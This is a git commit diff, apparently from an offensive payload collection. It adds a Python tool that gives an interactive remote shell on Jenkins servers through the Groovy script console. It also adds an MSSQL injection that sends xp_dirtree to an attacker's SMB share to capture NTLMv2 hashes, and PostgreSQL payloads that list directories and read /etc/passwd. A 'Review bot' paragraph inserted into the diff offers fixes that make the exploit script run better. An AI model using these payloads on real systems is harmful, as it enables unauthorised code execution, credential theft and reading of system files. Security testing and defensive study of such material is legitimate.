Jenkins Grrovy + MSSQL UNC + PostgreSQL list files
This commit is contained in:
parent
eac421432a
commit
78c882fb34
30
CVE Exploits/Jenkins Groovy Console.py
Normal file
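--- /dev/null
+++ b/CVE Exploits/Jenkins Groovy Console.py
@@ -0,0 +1,30 @@
+#!/usr/bin/env python
+# SRC: https://raw.githubusercontent.com/bl4de/security-tools/master/jgc.py
+# DOC: https://medium.com/@_bl4de/remote-code-execution-with-groovy-console-in-jenkins-bd6ef55c285b
+import requests
+import sys
+
+print """
+Jenkins Groovy Console cmd runner.
+
+usage: ./jgc.py [HOST]
+
+Then type any command and wait for STDOUT output from remote machine.
+Type 'exit' to exit :)
+"""
+URL = sys.argv[1] + '/scriptText'
+HEADERS = {
+    'User-Agent': 'jgc'
+}
+
+while 1:
+    CMD = raw_input(">> Enter command to execute (or type 'exit' to exit): ")
+    if CMD == 'exit':
+        print "exiting...\n"
+        exit(0)
+
+    DATA = {
+        'script': 'println "{}".execute().text'.format(CMD)
+    }
+    result = requests.post(URL, headers=HEADERS, data=DATA)
+    print result.text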
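Review bot: `URL = sys.argv[1] + '/scriptText'` reads the host argument without checking that one was supplied, so invoking the script with no HOST prints the usage banner and then dies with an IndexError instead of a clean usage error; add `if len(sys.argv) != 2: sys.exit(1)` before building URL. The shebang `#!/usr/bin/env python` resolves to Python 3 on current systems, where `print """..."""` and `raw_input` fail as a syntax error and a NameError respectively; either use `#!/usr/bin/env python2` or state the Python 2 requirement in the header comment next to the SRC/DOC lines. `requests.post(URL, headers=HEADERS, data=DATA)` passes no `timeout=`, so an unresponsive host blocks the input loop indefinitely; `timeout=10` is the usual addition. `exit(0)` relies on the helper injected by the site module, which is absent under `python -S`; `sys.exit(0)` is the portable form since `sys` is already imported.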
@ -68,6 +68,11 @@
|
||||
```
|
||||
|
||||
* [Active Directory Assessment and Privilege Escalation Script](https://github.com/hausec/ADAPE-Script)
|
||||
* [Ping Castle](https://github.com/vletoux/pingcastle)
|
||||
|
||||
```powershell
|
||||
pingcastle.exe --healthcheck --server <DOMAIN_CONTROLLER_IP> --user <USERNAME> --password <PASSWORD> --advanced-live --nullsession
|
||||
```
|
||||
|
||||
## Most common paths to AD compromise
|
||||
|
||||
|
@ -137,6 +137,14 @@ EXEC sp_configure 'xp_cmdshell',1;
|
||||
RECONFIGURE;
|
||||
```
|
||||
|
||||
## MSSQL UNC Path
|
||||
|
||||
MSSQL supports stacked queries so we can create a variable pointing to our IP address then use the `xp_dirtree` function to list the files in our SMB share and grab the NTLMv2 hash.
|
||||
|
||||
```sql
|
||||
1'; use master; exec xp_dirtree '\\10.10.15.XX\SHARE';--
|
||||
```
|
||||
|
||||
## MSSQL Make user DBA (DB admin)
|
||||
|
||||
```sql
|
||||
|
@ -26,9 +26,12 @@ AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))
|
||||
## PostgreSQL File Read
|
||||
|
||||
```sql
|
||||
select pg_ls_dir('./');
|
||||
select pg_read_file('PG_VERSION', 0, 200);
|
||||
```
|
||||
|
||||
NOTE: ``pg_read_file` doesn't accept the `/` character.
|
||||
|
||||
```sql
|
||||
CREATE TABLE temp(t TEXT);
|
||||
COPY temp FROM '/etc/passwd';
|
||||
|